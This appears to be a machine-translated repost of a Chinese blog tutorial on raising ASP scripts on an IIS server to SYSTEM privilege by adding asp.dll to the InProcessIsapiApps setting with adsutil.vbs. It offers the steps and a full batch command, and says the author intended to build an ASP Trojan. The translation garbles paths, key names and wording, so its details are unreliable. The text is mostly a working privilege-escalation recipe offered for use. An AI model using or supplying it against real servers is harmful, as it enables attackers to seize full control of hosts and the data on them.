2. Tech
  3. Remove the ASP permission to the highest

Remove the ASP permission to the highest

xiaoxiao2021-03-06  118

By: cnqing from: http://friend.91eb.com

Originally, I would like to write a proprietary ASP Trojan. Unfortunately, the time is not too much skill. Let me tell you the principle method first. Simply talk about it, there is no need to say too much. I understand it.

principle:

Asp files are running by ASP.DLL. Started by dllhost.exe. The identity is IWAN_NAME. If you put asp.dll in InProcesslsapiapps, it is started directly by inetifo.exe. Identity is System

method:

first step.

Get the contents of InProcesslsapiapps, with the command "CScript C: /inetpub/adminscripts/adsutil.vbs Get W3SVC / Inprocessisapiapps". A set of DLLs will be copied.

Second step

Write a BAT content for "CScript C: / INETPUB / Adminscripts / Adsutil VBS Set W3SVC / INPRPOCESSISAPIAPPS" C: /inetpub/adminscripts/asp.dll "·····

The omitted content is copied. Do not bring back the car with spaces

Finally, run this BAT.

E.g:

I get with "CScript C: /inetpub/adminscripts/adsutil.vbs Get W3SVC / Inprocessisapiapps"

"c: /winnt/system32/inetsrv/httpext.dll"

"c: /winnt/system32/inetsrv/httpodbc.dll"

"C: /winnt/system32/inetsrv/ssinc.dll"

"C: /winnt/system32/msw3prt.dll"

"C: / Program Files / Common Files / Microsoft Shared / Web Server Extensions / Isapi / _VTI_AUT / Author.dll"

"C: / Program Files / Common Files / Microsoft Shared / Web Server EXTENSIONS / ISAPI / _VTI_ADM / Admin.

"C: / Program Files / Common Files / Microsoft Shared / Web Server Extensions / ISAPI / SHTML.DLL"

Then your BAT should be:

cscript C: / Inetpub / AdminScripts / adsutil vbs set w3svc / inprpocessisapiapps "C: /Inetpub/AdminScripts/asp.dll" "c: /winnt/system32/inetsrv/httpext.dll" "c: / winnt / system32 / inetsrv / Httpodbc.dll "" c: /winnt/system32/inetsrv/ssinc.dll "" c: /winnt/system32/msw3prt.dll "C: / Program Files / Common files / microsoft shared / web server extensions / isapi / _vti_aut /author.dll "" C: / Program Files / Common Files / Microsoft Shared / Web Server Extensions / isapi / _vti_adm / admin.dll "" C: / Program Files / Common Files / Microsoft Shared / Web Server Extensions / isapi / shtml .dll "has been tested successfully! !

转载请注明原文地址:https://www.9cbs.com/read-99703.html

9cbs

New Post(0)